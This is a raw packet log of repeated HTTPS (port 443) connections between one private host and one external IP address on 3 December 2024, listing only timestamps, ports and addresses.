Dec 3, 2024 17:45:32.588783026 CET	49948	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:32.588797092 CET	443	49948	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:32.589134932 CET	49948	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:32.589139938 CET	443	49948	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:34.078041077 CET	443	49948	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:34.078155041 CET	443	49948	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:34.078170061 CET	49948	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:34.078200102 CET	49948	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:34.078737974 CET	49948	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:34.078752995 CET	443	49948	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:34.084980011 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:34.085011959 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:34.085064888 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:34.085371971 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:34.085382938 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:35.304297924 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:35.304374933 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:35.305067062 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:35.305067062 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:35.305079937 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:35.305094957 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:35.305160046 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:35.305175066 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:36.853348970 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:36.853508949 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:36.853530884 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:36.853848934 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:36.853935003 CET	49956	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:36.853955984 CET	443	49956	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:36.946923018 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:36.946983099 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:36.949275970 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:36.949384928 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:36.949394941 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:38.218807936 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:38.218907118 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:38.219487906 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:38.219494104 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:38.219856977 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:38.219861984 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:39.863642931 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:39.863687038 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:39.863694906 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:39.863729000 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:39.863733053 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:39.863765001 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:39.863797903 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:39.863831043 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:39.868086100 CET	49962	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:39.868099928 CET	443	49962	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:40.282032967 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:40.282068968 CET	443	49972	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:40.282124996 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:40.282407045 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:40.282419920 CET	443	49972	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:41.613826990 CET	443	49972	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:41.613892078 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:41.614547014 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:41.614557981 CET	443	49972	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:41.614748001 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:41.614756107 CET	443	49972	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:43.254853010 CET	443	49972	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:43.254987001 CET	443	49972	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:43.254985094 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:43.255158901 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:43.255269051 CET	49972	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:43.255286932 CET	443	49972	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:43.309149981 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:43.309206963 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:43.309384108 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:43.313066006 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:43.313087940 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:44.593058109 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:44.594985008 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:44.621742964 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:44.621769905 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:44.622656107 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:44.622664928 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:45.985508919 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:45.985574007 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:45.985608101 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:45.985634089 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:45.985650063 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:45.985690117 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:45.986041069 CET	49979	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:45.986057997 CET	443	49979	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:46.179133892 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:46.179183960 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:46.179246902 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:46.179603100 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:46.179619074 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:47.402417898 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:47.402473927 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:47.403347015 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:47.403353930 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:47.403656960 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:47.403661966 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:48.998533010 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:48.998631001 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:48.998663902 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:48.998682976 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:48.998733044 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:48.998733044 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:48.998986959 CET	49986	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:48.999003887 CET	443	49986	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:49.105587006 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:49.105631113 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:49.105741024 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:49.106095076 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:49.106108904 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:50.363351107 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:50.363398075 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:50.367139101 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:50.367146969 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:50.367383957 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:50.367388964 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:51.982748985 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:51.982795954 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:51.982815027 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:51.982847929 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:51.982852936 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:51.982892990 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:51.982893944 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:51.982937098 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:51.983220100 CET	49994	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:51.983236074 CET	443	49994	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:52.062092066 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:52.062160015 CET	443	50002	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:52.062232018 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:52.062647104 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:52.062661886 CET	443	50002	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:53.381993055 CET	443	50002	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:53.382246017 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:53.382922888 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:53.382929087 CET	443	50002	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:53.382966042 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:53.382971048 CET	443	50002	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:55.005115032 CET	443	50002	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:55.005215883 CET	443	50002	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:55.005213976 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:55.005424023 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:55.005522966 CET	50002	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:55.005537033 CET	443	50002	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:55.139048100 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:55.139098883 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:55.139210939 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:55.139708042 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:55.139719963 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:56.463088989 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:56.463151932 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:56.463872910 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:56.463886023 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:56.463990927 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:56.463995934 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:57.857805967 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:57.857867956 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:57.857909918 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:57.857986927 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:57.857995987 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:57.858136892 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:57.858416080 CET	50008	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:57.858436108 CET	443	50008	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:57.940390110 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:57.940449953 CET	443	50016	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:57.940511942 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:57.940808058 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:57.940825939 CET	443	50016	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:59.272841930 CET	443	50016	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:59.272932053 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:59.273452997 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:59.273459911 CET	443	50016	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:59.273730040 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:59.273735046 CET	443	50016	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:00.923681021 CET	443	50016	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:00.923782110 CET	443	50016	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:00.927993059 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:00.927993059 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:01.022924900 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:01.022989988 CET	443	50025	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:01.023082018 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:01.026921034 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:01.026936054 CET	443	50025	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:01.326920986 CET	50016	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:01.326972008 CET	443	50016	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:02.293571949 CET	443	50025	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:02.293632984 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:02.294238091 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:02.294250965 CET	443	50025	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:02.294523001 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:02.294528961 CET	443	50025	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:03.910917997 CET	443	50025	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:03.911030054 CET	443	50025	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:03.911082983 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:03.911123991 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:03.911427975 CET	50025	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:03.911449909 CET	443	50025	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:04.460019112 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:04.460071087 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:04.460143089 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:04.460417032 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:04.460441113 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:05.673113108 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:05.673224926 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:05.673729897 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:05.673738003 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:05.673984051 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:05.673989058 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:07.271734953 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:07.271809101 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:07.271826982 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:07.271840096 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:07.271871090 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:07.271898031 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:07.272126913 CET	50029	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:07.272141933 CET	443	50029	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:07.396593094 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:07.396640062 CET	443	50030	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:07.396703959 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:07.397061110 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:07.397074938 CET	443	50030	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:08.703943014 CET	443	50030	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:08.704029083 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:08.712115049 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:08.712130070 CET	443	50030	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:08.712536097 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:08.712543011 CET	443	50030	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:10.384301901 CET	443	50030	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:10.384399891 CET	443	50030	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:10.384480953 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:10.384481907 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:10.386919022 CET	50030	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:10.386940002 CET	443	50030	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:10.433574915 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:10.433618069 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:10.433682919 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:10.434191942 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:10.434204102 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:11.737425089 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:11.743479013 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:11.743479013 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:11.743510008 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:11.744924068 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:11.744929075 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:13.177192926 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:13.177262068 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:13.177301884 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:13.177316904 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:13.177344084 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:13.177362919 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:13.177743912 CET	50031	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:13.177762985 CET	443	50031	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:13.277234077 CET	50032	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:13.277288914 CET	443	50032	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:13.277354956 CET	50032	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:13.277800083 CET	50032	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:13.277813911 CET	443	50032	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:14.546226025 CET	443	50032	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:14.546289921 CET	50032	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:14.547143936 CET	50032	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:14.547157049 CET	443	50032	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:14.547511101 CET	50032	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:14.547517061 CET	443	50032	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:15.951153040 CET	443	50032	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:15.951494932 CET	443	50032	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:15.955024958 CET	50032	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:15.958913088 CET	50032	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:15.958936930 CET	443	50032	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:16.013751984 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:16.013818026 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:16.015055895 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:16.018918037 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:16.018934011 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:17.305671930 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:17.305730104 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:17.306206942 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:17.306217909 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:17.306487083 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:17.306493044 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:18.925230026 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:18.925307035 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:18.925343990 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:18.925385952 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:18.925391912 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:18.925406933 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:18.925427914 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:18.925446987 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:18.925930977 CET	50033	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:18.925952911 CET	443	50033	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:19.562928915 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:19.563000917 CET	443	50034	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:19.563221931 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:19.563750029 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:19.563766003 CET	443	50034	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:20.824553967 CET	443	50034	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:20.824721098 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:20.825254917 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:20.825269938 CET	443	50034	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:20.825535059 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:20.825541973 CET	443	50034	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:22.430237055 CET	443	50034	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:22.430341005 CET	443	50034	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:22.430375099 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:22.430713892 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:22.430830002 CET	50034	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:22.430859089 CET	443	50034	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:22.507616997 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:22.507694960 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:22.507759094 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:22.508172035 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:22.508191109 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:23.773441076 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:23.775019884 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:23.775654078 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:23.775654078 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:23.775665998 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:23.775681019 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:25.189990997 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:25.190059900 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:25.190102100 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:25.190108061 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:25.190152884 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:25.190172911 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:25.190476894 CET	50035	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:25.190495014 CET	443	50035	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:25.299477100 CET	50036	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:25.299514055 CET	443	50036	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:25.299576044 CET	50036	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:25.299951077 CET	50036	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:25.299964905 CET	443	50036	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:26.531645060 CET	443	50036	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:26.531713009 CET	50036	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:26.532464027 CET	50036	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:26.532471895 CET	443	50036	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:26.532879114 CET	50036	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:26.532882929 CET	443	50036	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:28.179030895 CET	443	50036	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:28.179132938 CET	50036	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:28.179137945 CET	443	50036	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:28.179231882 CET	50036	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:28.179723024 CET	50036	443	192.168.2.4	104.21.68.89
